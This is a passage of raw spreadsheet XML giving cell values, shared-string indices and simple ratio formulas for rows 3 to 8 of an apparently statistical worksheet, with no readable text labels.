        <v>2057.0</v>
      </c>
      <c r="DH3" s="89">
        <v>39.0</v>
      </c>
      <c r="DI3" s="89">
        <v>45.0</v>
      </c>
      <c r="DJ3" s="89">
        <v>71.0</v>
      </c>
      <c r="DK3" s="89">
        <v>27.0</v>
      </c>
      <c r="DL3" s="89">
        <v>28.0</v>
      </c>
      <c r="DM3" s="89">
        <v>48.0</v>
      </c>
      <c r="DN3" s="89"/>
      <c r="DO3" s="89"/>
      <c r="DP3" s="89"/>
      <c r="DQ3" s="90">
        <f t="shared" ref="DQ3:DQ133" si="9">DJ3/P3</f>
        <v>0.03446601942</v>
      </c>
      <c r="DR3" s="91" t="s">
        <v>134</v>
      </c>
      <c r="DS3" s="92" t="s">
        <v>135</v>
      </c>
      <c r="DT3" s="93">
        <v>2.0</v>
      </c>
      <c r="DU3" s="93">
        <v>19.0</v>
      </c>
      <c r="DV3" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW3" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX3" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY3" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ3" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA3" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB3" s="74">
        <v>2059.0</v>
      </c>
      <c r="EC3" s="74">
        <v>19.0</v>
      </c>
      <c r="ED3" s="95">
        <f t="shared" ref="ED3:ED133" si="10">EC3/P3</f>
        <v>0.009223300971</v>
      </c>
      <c r="EE3" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="4" ht="153.75" customHeight="1">
      <c r="B4" s="71" t="s">
        <v>97</v>
      </c>
      <c r="C4" s="97" t="s">
        <v>12</v>
      </c>
      <c r="D4" s="72" t="s">
        <v>98</v>
      </c>
      <c r="E4" s="97" t="s">
        <v>99</v>
      </c>
      <c r="F4" s="72" t="s">
        <v>100</v>
      </c>
      <c r="G4" s="97" t="s">
        <v>136</v>
      </c>
      <c r="H4" s="72" t="s">
        <v>137</v>
      </c>
      <c r="I4" s="73" t="s">
        <v>138</v>
      </c>
      <c r="J4" s="73" t="s">
        <v>139</v>
      </c>
      <c r="K4" s="73" t="s">
        <v>140</v>
      </c>
      <c r="L4" s="74">
        <v>181.0</v>
      </c>
      <c r="M4" s="74">
        <v>171.0</v>
      </c>
      <c r="N4" s="74">
        <v>171.0</v>
      </c>
      <c r="O4" s="74">
        <f t="shared" si="1"/>
        <v>171</v>
      </c>
      <c r="P4" s="74">
        <v>171.0</v>
      </c>
      <c r="Q4" s="74">
        <v>0.0</v>
      </c>
      <c r="R4" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S4" s="76" t="s">
        <v>141</v>
      </c>
      <c r="T4" s="98" t="s">
        <v>142</v>
      </c>
      <c r="U4" s="77" t="s">
        <v>143</v>
      </c>
      <c r="V4" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W4" s="76" t="s">
        <v>145</v>
      </c>
      <c r="X4" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y4" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z4" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA4" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB4" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC4" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD4" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE4" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF4" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG4" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH4" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI4" s="78"/>
      <c r="AJ4" s="78"/>
      <c r="AK4" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL4" s="78"/>
      <c r="AM4" s="78"/>
      <c r="AN4" s="78"/>
      <c r="AO4" s="78"/>
      <c r="AP4" s="80"/>
      <c r="AQ4" s="80"/>
      <c r="AR4" s="80"/>
      <c r="AS4" s="80">
        <v>0.0</v>
      </c>
      <c r="AT4" s="80"/>
      <c r="AU4" s="80"/>
      <c r="AV4" s="80"/>
      <c r="AW4" s="80"/>
      <c r="AX4" s="80"/>
      <c r="AY4" s="80"/>
      <c r="AZ4" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA4" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB4" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC4" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD4" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE4" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF4" s="82"/>
      <c r="BG4" s="82"/>
      <c r="BH4" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI4" s="82"/>
      <c r="BJ4" s="82"/>
      <c r="BK4" s="82"/>
      <c r="BL4" s="82"/>
      <c r="BM4" s="83"/>
      <c r="BN4" s="83"/>
      <c r="BO4" s="83"/>
      <c r="BP4" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ4" s="83"/>
      <c r="BR4" s="83"/>
      <c r="BS4" s="83"/>
      <c r="BT4" s="83"/>
      <c r="BU4" s="83"/>
      <c r="BV4" s="83"/>
      <c r="BW4" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX4" s="85" t="s">
        <v>146</v>
      </c>
      <c r="BY4" s="85">
        <v>2.0</v>
      </c>
      <c r="BZ4" s="85">
        <v>72.0</v>
      </c>
      <c r="CA4" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB4" s="85" t="s">
        <v>147</v>
      </c>
      <c r="CC4" s="85"/>
      <c r="CD4" s="85"/>
      <c r="CE4" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF4" s="85"/>
      <c r="CG4" s="85"/>
      <c r="CH4" s="85"/>
      <c r="CI4" s="85"/>
      <c r="CJ4" s="86"/>
      <c r="CK4" s="86"/>
      <c r="CL4" s="86"/>
      <c r="CM4" s="86">
        <v>0.0</v>
      </c>
      <c r="CN4" s="86"/>
      <c r="CO4" s="86"/>
      <c r="CP4" s="86"/>
      <c r="CQ4" s="86"/>
      <c r="CR4" s="86"/>
      <c r="CS4" s="86"/>
      <c r="CT4" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU4" s="88" t="s">
        <v>148</v>
      </c>
      <c r="CV4" s="88">
        <v>7.0</v>
      </c>
      <c r="CW4" s="88">
        <v>460.0</v>
      </c>
      <c r="CX4" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY4" s="88" t="s">
        <v>150</v>
      </c>
      <c r="CZ4" s="88"/>
      <c r="DA4" s="88"/>
      <c r="DB4" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC4" s="88"/>
      <c r="DD4" s="88"/>
      <c r="DE4" s="88"/>
      <c r="DF4" s="88"/>
      <c r="DG4" s="89"/>
      <c r="DH4" s="89"/>
      <c r="DI4" s="89"/>
      <c r="DJ4" s="89">
        <v>0.0</v>
      </c>
      <c r="DK4" s="89"/>
      <c r="DL4" s="89"/>
      <c r="DM4" s="89"/>
      <c r="DN4" s="89"/>
      <c r="DO4" s="89"/>
      <c r="DP4" s="89"/>
      <c r="DQ4" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR4" s="91" t="s">
        <v>151</v>
      </c>
      <c r="DS4" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT4" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU4" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV4" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW4" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX4" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY4" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ4" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA4" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB4" s="74">
        <v>181.0</v>
      </c>
      <c r="EC4" s="74">
        <v>0.0</v>
      </c>
      <c r="ED4" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE4" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="5" ht="153.75" customHeight="1">
      <c r="B5" s="71" t="s">
        <v>97</v>
      </c>
      <c r="C5" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D5" s="72" t="s">
        <v>98</v>
      </c>
      <c r="E5" s="72" t="s">
        <v>99</v>
      </c>
      <c r="F5" s="72" t="s">
        <v>100</v>
      </c>
      <c r="G5" s="72" t="s">
        <v>136</v>
      </c>
      <c r="H5" s="72" t="s">
        <v>137</v>
      </c>
      <c r="I5" s="73" t="s">
        <v>138</v>
      </c>
      <c r="J5" s="73" t="s">
        <v>152</v>
      </c>
      <c r="K5" s="73" t="s">
        <v>153</v>
      </c>
      <c r="L5" s="74">
        <v>385.0</v>
      </c>
      <c r="M5" s="74">
        <v>260.0</v>
      </c>
      <c r="N5" s="74">
        <v>4615.0</v>
      </c>
      <c r="O5" s="74">
        <f t="shared" si="1"/>
        <v>4615</v>
      </c>
      <c r="P5" s="74">
        <v>4615.0</v>
      </c>
      <c r="Q5" s="74">
        <v>0.0</v>
      </c>
      <c r="R5" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S5" s="76" t="s">
        <v>141</v>
      </c>
      <c r="T5" s="76" t="s">
        <v>154</v>
      </c>
      <c r="U5" s="77" t="s">
        <v>155</v>
      </c>
      <c r="V5" s="76" t="s">
        <v>156</v>
      </c>
      <c r="W5" s="76" t="s">
        <v>157</v>
      </c>
      <c r="X5" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y5" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z5" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA5" s="100" t="s">
        <v>13</v>
      </c>
      <c r="AB5" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC5" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD5" s="101" t="s">
        <v>158</v>
      </c>
      <c r="AE5" s="78">
        <v>43.0</v>
      </c>
      <c r="AF5" s="78">
        <v>62.0</v>
      </c>
      <c r="AG5" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH5" s="101" t="s">
        <v>159</v>
      </c>
      <c r="AI5" s="101"/>
      <c r="AJ5" s="101"/>
      <c r="AK5" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL5" s="101"/>
      <c r="AM5" s="101"/>
      <c r="AN5" s="101"/>
      <c r="AO5" s="101"/>
      <c r="AP5" s="80"/>
      <c r="AQ5" s="80"/>
      <c r="AR5" s="80"/>
      <c r="AS5" s="80">
        <v>43.0</v>
      </c>
      <c r="AT5" s="80"/>
      <c r="AU5" s="80"/>
      <c r="AV5" s="80"/>
      <c r="AW5" s="80"/>
      <c r="AX5" s="80"/>
      <c r="AY5" s="80"/>
      <c r="AZ5" s="81">
        <f t="shared" si="3"/>
        <v>0.00931744312</v>
      </c>
      <c r="BA5" s="82" t="s">
        <v>160</v>
      </c>
      <c r="BB5" s="82">
        <v>57.0</v>
      </c>
      <c r="BC5" s="82">
        <v>83.0</v>
      </c>
      <c r="BD5" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE5" s="102" t="s">
        <v>161</v>
      </c>
      <c r="BF5" s="102"/>
      <c r="BG5" s="102"/>
      <c r="BH5" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI5" s="102"/>
      <c r="BJ5" s="102"/>
      <c r="BK5" s="102"/>
      <c r="BL5" s="102"/>
      <c r="BM5" s="103"/>
      <c r="BN5" s="103"/>
      <c r="BO5" s="103"/>
      <c r="BP5" s="83">
        <v>57.0</v>
      </c>
      <c r="BQ5" s="83"/>
      <c r="BR5" s="83"/>
      <c r="BS5" s="83"/>
      <c r="BT5" s="83"/>
      <c r="BU5" s="83"/>
      <c r="BV5" s="83"/>
      <c r="BW5" s="84">
        <f t="shared" si="5"/>
        <v>0.01235102925</v>
      </c>
      <c r="BX5" s="85" t="s">
        <v>162</v>
      </c>
      <c r="BY5" s="85">
        <v>62.0</v>
      </c>
      <c r="BZ5" s="85">
        <v>4812.0</v>
      </c>
      <c r="CA5" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB5" s="85" t="s">
        <v>163</v>
      </c>
      <c r="CC5" s="85"/>
      <c r="CD5" s="85"/>
      <c r="CE5" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF5" s="85"/>
      <c r="CG5" s="85"/>
      <c r="CH5" s="85"/>
      <c r="CI5" s="85"/>
      <c r="CJ5" s="86"/>
      <c r="CK5" s="86"/>
      <c r="CL5" s="86"/>
      <c r="CM5" s="86">
        <v>62.0</v>
      </c>
      <c r="CN5" s="86"/>
      <c r="CO5" s="86"/>
      <c r="CP5" s="86"/>
      <c r="CQ5" s="86"/>
      <c r="CR5" s="86"/>
      <c r="CS5" s="86"/>
      <c r="CT5" s="87">
        <f t="shared" si="7"/>
        <v>0.01343445287</v>
      </c>
      <c r="CU5" s="104" t="s">
        <v>164</v>
      </c>
      <c r="CV5" s="88">
        <v>74.0</v>
      </c>
      <c r="CW5" s="88">
        <v>4983.0</v>
      </c>
      <c r="CX5" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY5" s="104" t="s">
        <v>165</v>
      </c>
      <c r="CZ5" s="104"/>
      <c r="DA5" s="104"/>
      <c r="DB5" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC5" s="104"/>
      <c r="DD5" s="104"/>
      <c r="DE5" s="104"/>
      <c r="DF5" s="104"/>
      <c r="DG5" s="89"/>
      <c r="DH5" s="89"/>
      <c r="DI5" s="89"/>
      <c r="DJ5" s="89">
        <v>74.0</v>
      </c>
      <c r="DK5" s="89"/>
      <c r="DL5" s="89"/>
      <c r="DM5" s="89"/>
      <c r="DN5" s="89"/>
      <c r="DO5" s="89"/>
      <c r="DP5" s="89"/>
      <c r="DQ5" s="90">
        <f t="shared" si="9"/>
        <v>0.01603466956</v>
      </c>
      <c r="DR5" s="91" t="s">
        <v>166</v>
      </c>
      <c r="DS5" s="92">
        <v>12648.0</v>
      </c>
      <c r="DT5" s="93">
        <v>1.0</v>
      </c>
      <c r="DU5" s="93">
        <v>1.0</v>
      </c>
      <c r="DV5" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW5" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX5" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY5" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ5" s="94" t="s">
        <v>167</v>
      </c>
      <c r="EA5" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB5" s="74">
        <v>385.0</v>
      </c>
      <c r="EC5" s="74">
        <v>1.0</v>
      </c>
      <c r="ED5" s="95">
        <f t="shared" si="10"/>
        <v>0.0002166847237</v>
      </c>
      <c r="EE5" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="6" ht="153.75" customHeight="1">
      <c r="B6" s="71" t="s">
        <v>97</v>
      </c>
      <c r="C6" s="97" t="s">
        <v>12</v>
      </c>
      <c r="D6" s="72" t="s">
        <v>98</v>
      </c>
      <c r="E6" s="97" t="s">
        <v>168</v>
      </c>
      <c r="F6" s="72" t="s">
        <v>169</v>
      </c>
      <c r="G6" s="97" t="s">
        <v>170</v>
      </c>
      <c r="H6" s="72" t="s">
        <v>171</v>
      </c>
      <c r="I6" s="73" t="s">
        <v>172</v>
      </c>
      <c r="J6" s="73" t="s">
        <v>139</v>
      </c>
      <c r="K6" s="73" t="s">
        <v>173</v>
      </c>
      <c r="L6" s="74">
        <v>1.0</v>
      </c>
      <c r="M6" s="74">
        <v>1.0</v>
      </c>
      <c r="N6" s="74">
        <v>1.0</v>
      </c>
      <c r="O6" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P6" s="74">
        <v>1.0</v>
      </c>
      <c r="Q6" s="74">
        <v>0.0</v>
      </c>
      <c r="R6" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S6" s="76" t="s">
        <v>174</v>
      </c>
      <c r="T6" s="76" t="s">
        <v>175</v>
      </c>
      <c r="U6" s="77" t="s">
        <v>176</v>
      </c>
      <c r="V6" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W6" s="76" t="s">
        <v>177</v>
      </c>
      <c r="X6" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y6" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z6" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA6" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB6" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC6" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD6" s="78">
        <v>255.0</v>
      </c>
      <c r="AE6" s="78">
        <v>1.0</v>
      </c>
      <c r="AF6" s="78">
        <v>1.0</v>
      </c>
      <c r="AG6" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH6" s="78">
        <v>255.0</v>
      </c>
      <c r="AI6" s="78"/>
      <c r="AJ6" s="78"/>
      <c r="AK6" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL6" s="78"/>
      <c r="AM6" s="78"/>
      <c r="AN6" s="78"/>
      <c r="AO6" s="78"/>
      <c r="AP6" s="80"/>
      <c r="AQ6" s="80"/>
      <c r="AR6" s="80"/>
      <c r="AS6" s="80">
        <v>1.0</v>
      </c>
      <c r="AT6" s="80"/>
      <c r="AU6" s="80"/>
      <c r="AV6" s="80"/>
      <c r="AW6" s="80"/>
      <c r="AX6" s="80"/>
      <c r="AY6" s="80"/>
      <c r="AZ6" s="81">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="BA6" s="102">
        <v>255.0</v>
      </c>
      <c r="BB6" s="82">
        <v>1.0</v>
      </c>
      <c r="BC6" s="82">
        <v>1.0</v>
      </c>
      <c r="BD6" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE6" s="102">
        <v>255.0</v>
      </c>
      <c r="BF6" s="102"/>
      <c r="BG6" s="102"/>
      <c r="BH6" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI6" s="102"/>
      <c r="BJ6" s="102"/>
      <c r="BK6" s="102"/>
      <c r="BL6" s="102"/>
      <c r="BM6" s="103"/>
      <c r="BN6" s="103"/>
      <c r="BO6" s="103"/>
      <c r="BP6" s="83">
        <v>1.0</v>
      </c>
      <c r="BQ6" s="83"/>
      <c r="BR6" s="83"/>
      <c r="BS6" s="83"/>
      <c r="BT6" s="83"/>
      <c r="BU6" s="83"/>
      <c r="BV6" s="83"/>
      <c r="BW6" s="84">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="BX6" s="105">
        <v>255.0</v>
      </c>
      <c r="BY6" s="85">
        <v>1.0</v>
      </c>
      <c r="BZ6" s="85">
        <v>1.0</v>
      </c>
      <c r="CA6" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB6" s="105">
        <v>255.0</v>
      </c>
      <c r="CC6" s="105"/>
      <c r="CD6" s="105"/>
      <c r="CE6" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF6" s="105"/>
      <c r="CG6" s="105"/>
      <c r="CH6" s="105"/>
      <c r="CI6" s="105"/>
      <c r="CJ6" s="106"/>
      <c r="CK6" s="106"/>
      <c r="CL6" s="106"/>
      <c r="CM6" s="86">
        <v>1.0</v>
      </c>
      <c r="CN6" s="86"/>
      <c r="CO6" s="86"/>
      <c r="CP6" s="86"/>
      <c r="CQ6" s="86"/>
      <c r="CR6" s="86"/>
      <c r="CS6" s="86"/>
      <c r="CT6" s="87">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="CU6" s="88" t="s">
        <v>178</v>
      </c>
      <c r="CV6" s="88">
        <v>4.0</v>
      </c>
      <c r="CW6" s="88">
        <v>7.0</v>
      </c>
      <c r="CX6" s="79" t="s">
        <v>149</v>
      </c>
      <c r="CY6" s="104" t="s">
        <v>179</v>
      </c>
      <c r="CZ6" s="104"/>
      <c r="DA6" s="104"/>
      <c r="DB6" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC6" s="104"/>
      <c r="DD6" s="104"/>
      <c r="DE6" s="104"/>
      <c r="DF6" s="104"/>
      <c r="DG6" s="89"/>
      <c r="DH6" s="89"/>
      <c r="DI6" s="89"/>
      <c r="DJ6" s="89">
        <v>1.0</v>
      </c>
      <c r="DK6" s="89"/>
      <c r="DL6" s="89"/>
      <c r="DM6" s="89"/>
      <c r="DN6" s="89"/>
      <c r="DO6" s="89"/>
      <c r="DP6" s="89"/>
      <c r="DQ6" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR6" s="91"/>
      <c r="DS6" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT6" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU6" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV6" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW6" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX6" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY6" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ6" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA6" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB6" s="74">
        <v>1.0</v>
      </c>
      <c r="EC6" s="74">
        <v>0.0</v>
      </c>
      <c r="ED6" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE6" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="7" ht="107.25" customHeight="1">
      <c r="B7" s="71" t="s">
        <v>97</v>
      </c>
      <c r="C7" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D7" s="72" t="s">
        <v>98</v>
      </c>
      <c r="E7" s="72" t="s">
        <v>180</v>
      </c>
      <c r="F7" s="72" t="s">
        <v>181</v>
      </c>
      <c r="G7" s="72" t="s">
        <v>182</v>
      </c>
      <c r="H7" s="107" t="s">
        <v>183</v>
      </c>
      <c r="I7" s="73" t="s">
        <v>184</v>
      </c>
      <c r="J7" s="73" t="s">
        <v>185</v>
      </c>
      <c r="K7" s="73" t="s">
        <v>186</v>
      </c>
      <c r="L7" s="74">
        <v>169.0</v>
      </c>
      <c r="M7" s="74">
        <v>1.0</v>
      </c>
      <c r="N7" s="74">
        <v>1.0</v>
      </c>
      <c r="O7" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P7" s="74">
        <v>1.0</v>
      </c>
      <c r="Q7" s="74">
        <v>0.0</v>
      </c>
      <c r="R7" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S7" s="108" t="s">
        <v>188</v>
      </c>
      <c r="T7" s="76" t="s">
        <v>189</v>
      </c>
      <c r="U7" s="77" t="s">
        <v>190</v>
      </c>
      <c r="V7" s="76" t="s">
        <v>191</v>
      </c>
      <c r="W7" s="109"/>
      <c r="X7" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y7" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z7" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA7" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB7" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC7" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD7" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE7" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF7" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG7" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH7" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI7" s="78"/>
      <c r="AJ7" s="78"/>
      <c r="AK7" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL7" s="78"/>
      <c r="AM7" s="78"/>
      <c r="AN7" s="78"/>
      <c r="AO7" s="78"/>
      <c r="AP7" s="80"/>
      <c r="AQ7" s="80"/>
      <c r="AR7" s="80"/>
      <c r="AS7" s="80">
        <v>0.0</v>
      </c>
      <c r="AT7" s="80"/>
      <c r="AU7" s="80"/>
      <c r="AV7" s="80"/>
      <c r="AW7" s="80"/>
      <c r="AX7" s="80"/>
      <c r="AY7" s="80"/>
      <c r="AZ7" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA7" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB7" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC7" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD7" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE7" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF7" s="82"/>
      <c r="BG7" s="82"/>
      <c r="BH7" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI7" s="82"/>
      <c r="BJ7" s="82"/>
      <c r="BK7" s="82"/>
      <c r="BL7" s="82"/>
      <c r="BM7" s="83"/>
      <c r="BN7" s="83"/>
      <c r="BO7" s="83"/>
      <c r="BP7" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ7" s="83"/>
      <c r="BR7" s="83"/>
      <c r="BS7" s="83"/>
      <c r="BT7" s="83"/>
      <c r="BU7" s="83"/>
      <c r="BV7" s="83"/>
      <c r="BW7" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX7" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY7" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ7" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA7" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB7" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC7" s="85"/>
      <c r="CD7" s="85"/>
      <c r="CE7" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF7" s="85"/>
      <c r="CG7" s="85"/>
      <c r="CH7" s="85"/>
      <c r="CI7" s="85"/>
      <c r="CJ7" s="86"/>
      <c r="CK7" s="86"/>
      <c r="CL7" s="86"/>
      <c r="CM7" s="86">
        <v>0.0</v>
      </c>
      <c r="CN7" s="86"/>
      <c r="CO7" s="86"/>
      <c r="CP7" s="86"/>
      <c r="CQ7" s="86"/>
      <c r="CR7" s="86"/>
      <c r="CS7" s="86"/>
      <c r="CT7" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU7" s="88" t="s">
        <v>192</v>
      </c>
      <c r="CV7" s="88">
        <v>3.0</v>
      </c>
      <c r="CW7" s="88">
        <v>12.0</v>
      </c>
      <c r="CX7" s="79" t="s">
        <v>192</v>
      </c>
      <c r="CY7" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ7" s="88"/>
      <c r="DA7" s="88"/>
      <c r="DB7" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC7" s="88"/>
      <c r="DD7" s="88"/>
      <c r="DE7" s="88"/>
      <c r="DF7" s="88"/>
      <c r="DG7" s="89"/>
      <c r="DH7" s="89"/>
      <c r="DI7" s="89"/>
      <c r="DJ7" s="89">
        <v>0.0</v>
      </c>
      <c r="DK7" s="89"/>
      <c r="DL7" s="89"/>
      <c r="DM7" s="89"/>
      <c r="DN7" s="89"/>
      <c r="DO7" s="89"/>
      <c r="DP7" s="89"/>
      <c r="DQ7" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR7" s="91"/>
      <c r="DS7" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT7" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU7" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV7" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW7" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX7" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY7" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ7" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA7" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB7" s="74">
        <v>57.0</v>
      </c>
      <c r="EC7" s="74">
        <v>0.0</v>
      </c>
      <c r="ED7" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE7" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="8" ht="107.25" customHeight="1">
      <c r="B8" s="71" t="s">
        <v>97</v>
      </c>
      <c r="C8" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D8" s="72" t="s">
        <v>98</v>
      </c>
      <c r="E8" s="72" t="s">
        <v>193</v>
      </c>
      <c r="F8" s="72" t="s">
        <v>194</v>
      </c>
      <c r="G8" s="72" t="s">
        <v>195</v>
      </c>
      <c r="H8" s="107" t="s">
        <v>196</v>
      </c>
      <c r="I8" s="73" t="s">
        <v>197</v>
      </c>
      <c r="J8" s="73" t="s">
        <v>198</v>
      </c>
      <c r="K8" s="73" t="s">
        <v>199</v>
      </c>
      <c r="L8" s="74">
        <v>7.0</v>
      </c>
      <c r="M8" s="74">
        <v>1.0</v>
      </c>
      <c r="N8" s="74">
        <v>1.0</v>
      </c>
      <c r="O8" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P8" s="74">
        <v>1.0</v>
      </c>
      <c r="Q8" s="74">
        <v>0.0</v>
      </c>
